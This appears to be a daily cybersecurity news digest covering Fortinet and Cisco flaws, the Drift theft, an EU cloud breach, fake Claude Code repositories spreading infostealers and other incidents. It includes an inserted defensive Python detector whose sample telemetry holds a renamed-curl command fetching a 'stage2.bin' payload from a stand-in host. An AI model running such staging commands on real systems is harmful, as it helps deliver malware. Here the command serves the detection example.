Here are today’s top cybersecurity stories for Monday, April 6, 2026.
Fortinet Patches Actively Exploited CVE-2026-35616 in FortiClient EMS
Fortinet released an emergency out-of-band hotfix for CVE-2026-35616, a CVSS 9.1 improper access control vulnerability in FortiClient Enterprise Management Server (EMS) versions 7.4.5 and 7.4.6. The flaw allows unauthenticated attackers to execute code or commands via crafted API requests. Exploitation was first recorded against researcher honeypots on March 31, and Shadowserver has identified over 2,000 internet-exposed instances. Organizations running affected versions are urged to apply the hotfix immediately or upgrade to FortiClient EMS 7.4.7 when available. BleepingComputer | The Hacker News
North Korean Group UNC4736 Behind $285 Million Drift Protocol Hack in Six-Month Operation
Solana-based decentralized exchange Drift confirmed that approximately $285 million was stolen on April 1, 2026, in an attack attributed with medium confidence to North Korean state-sponsored group UNC4736, also tracked as AppleJeus and Citrine Sleet. The group spent six months building a trusted presence inside the Drift ecosystem, socially engineering multisig signers into pre-signing hidden authorizations, then triggering a zero-timelock Security Council migration that eliminated the protocol’s final safeguard. Attackers also created a fabricated token with manipulated oracle pricing to drain additional funds. This is the largest DeFi theft of 2026 and the second-largest Solana exploit in history. The Hacker News
CERT-EU Formally Attributes European Commission Cloud Breach to TeamPCP
CERT-EU confirmed the TeamPCP threat group breached the European Commission’s AWS cloud environment on March 19 using an API key stolen in the earlier Trivy supply chain attack. The breach exposed data from 30 EU entities including names, email addresses, and email content from the Europa web hosting platform. The Commission’s Cybersecurity Operations Center did not detect abnormal activity until March 24 — five days after initial access. ShinyHunters published approximately 340 GB of uncompressed stolen data on their dark web leak site on March 28. BleepingComputer
Fake Claude Code Repositories on GitHub Deliver Vidar Infostealer and GhostSocks Malware
Threat actors are using interest in the accidental Anthropic Claude Code source code leak — which occurred on March 31 when a 59.8 MB JavaScript source map was published in an npm package — to distribute malware through fake GitHub repositories. The malicious archive, named “Claude Code – Leaked Source Code,” installs a Rust-based dropper that deploys Vidar v18.7 infostealer and GhostSocks proxy malware. Trend Micro researchers identified the campaign as part of a broader rotating-lure operation active since February 2026 that has impersonated more than 25 software brands. BleepingComputer
Microsoft Documents WhatsApp-Delivered VBS Backdoor Campaign Targeting Windows Users
Microsoft Defender Experts have documented a multi-stage malware campaign, active since late February 2026, delivering malicious Visual Basic Script (VBS) files via WhatsApp attachments. Once executed, scripts drop renamed Windows system tools into hidden directories and retrieve additional payloads from trusted cloud services such as AWS, Tencent Cloud, and Backblaze B2 to blend into normal network traffic. A final unsigned MSI package installs a persistent remote access backdoor. Microsoft recommends organizations block script host execution in untrusted paths and inspect outbound traffic to cloud storage platforms. Microsoft Security Blog
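Detection logic for the three behaviours described above (a script host run from an untrusted user-writable path, a renamed system tool, and a non-browser process reaching cloud storage), as an added example that is not from the original post or from Microsoft; the Sysmon-like event shape, its field names and the cloud-storage domain patterns are assumptions, and the telemetry is constructed.

```python
import re

# Constructed sample telemetry (not real campaign data) in a simplified
# Sysmon-like shape; Image, CommandLine, OriginalFileName and
# DestinationHostname are assumed field names.
SAMPLE_EVENTS = [
    {"type": "process", "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\Downloads\WhatsApp Doc.vbs"',
     "OriginalFileName": "wscript.exe"},
    {"type": "process", "Image": r"C:\Users\alice\AppData\Local\.cache\svc.exe",
     "CommandLine": r"svc.exe -o stage2.bin https://example.invalid/x",
     "OriginalFileName": "curl.exe"},
    {"type": "process", "Image": r"C:\Program Files\Vendor\app.exe",
     "CommandLine": r"app.exe --update", "OriginalFileName": "app.exe"},
    {"type": "network", "Image": r"C:\Users\alice\AppData\Local\.cache\svc.exe",
     "DestinationHostname": "f000.backblazeb2.com"},
    {"type": "network", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationHostname": "bucket.s3.amazonaws.com"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# User-writable locations where a messenger attachment would land.
UNTRUSTED_DIRS = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData|Desktop)\\|\\Temp\\|\\Public\\", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.I)
# Services named in the report; the domain suffixes are assumptions.
CLOUD_STORAGE = re.compile(r"(amazonaws\.com|myqcloud\.com|backblazeb2\.com)$", re.I)
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def analyze(events):
    """Return (rule, detail) findings for the staged-script pattern."""
    findings = []
    for e in events:
        img = basename(e["Image"])
        if e["type"] == "process":
            cmd = e["CommandLine"]
            # 1. Script host executing a script from an untrusted, user-writable path.
            if img in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd) and UNTRUSTED_DIRS.search(cmd):
                findings.append(("script_host_untrusted_path", e["Image"]))
            # 2. Renamed system tool: PE OriginalFileName differs from on-disk name.
            orig = e.get("OriginalFileName", "").lower()
            if orig and orig != img:
                findings.append(("renamed_tool", f"{img} is really {orig}"))
        elif e["type"] == "network":
            # 3. Non-browser process talking to cloud storage used for staging.
            if CLOUD_STORAGE.search(e["DestinationHostname"]) and img not in BROWSERS:
                findings.append(("cloud_storage_egress", e["DestinationHostname"]))
    return findings

if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

Each rule alone is noisy in a real estate; the value is in correlating all three against the same host or process lineage, which an EDR query can do over the same fields.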
Cisco Patches Identity Services Engine XXE Flaw After Public PoC Exploit Released
Cisco issued a patch for CVE-2026-20029, an XML External Entity (XXE) injection vulnerability in Cisco Identity Services Engine (ISE) and ISE Passive Identity Connector. Attackers with valid administrative credentials can upload a malicious XML file to read arbitrary files from the underlying operating system. Cisco has confirmed no active exploitation at this time, but public proof-of-concept exploit code is now available, increasing risk for organizations that delay patching. No workarounds exist — software updates are the only fix. BleepingComputer
Canada Computers Confirms Magecart Attack Exposed Payment Data of 1,284 Customers
Canada Computers & Electronics confirmed a card skimmer attack on its retail website that exposed full payment card details and personal information for 1,284 guest checkout customers. The malicious script was active between December 29, 2025, and January 22, 2026, when it was removed following a public Reddit post by a customer whose two support tickets were closed without response. Member accounts and in-store purchases were not affected. Affected customers are being offered two years of free credit monitoring and identity theft protection. CBC News | SC Media
WhatsApp Alerts 200 Users After Italian Surveillance Firm Deployed Trojanized iOS App
Meta’s WhatsApp notified approximately 200 users, primarily in Italy, that they had installed a trojanized fake version of the iOS WhatsApp application developed by Asigint, a subsidiary of Italian surveillance company SIO Spa. The malicious app exfiltrated sensitive data, recorded audio, and accessed device cameras. WhatsApp logged out affected users, issued privacy warnings, and plans to serve Asigint with a formal legal demand to cease all malicious activities. The Hacker News
Nacogdoches Memorial Hospital Breach Exposes Data of 257,000 Patients
Nacogdoches Memorial Hospital in Texas disclosed that an unauthorized actor accessed its network between January 15 and January 31, 2026, exfiltrating files containing names, addresses, Social Security numbers, dates of birth, medical record numbers, health plan beneficiary numbers, and facial photographs for 257,073 individuals. Notification letters were not issued until March 31 — more than two months after discovery — drawing scrutiny from multiple law firms over potential violations of state and federal breach notification timelines. SecurityWeek
Stay tuned for today’s in-depth analysis posts.

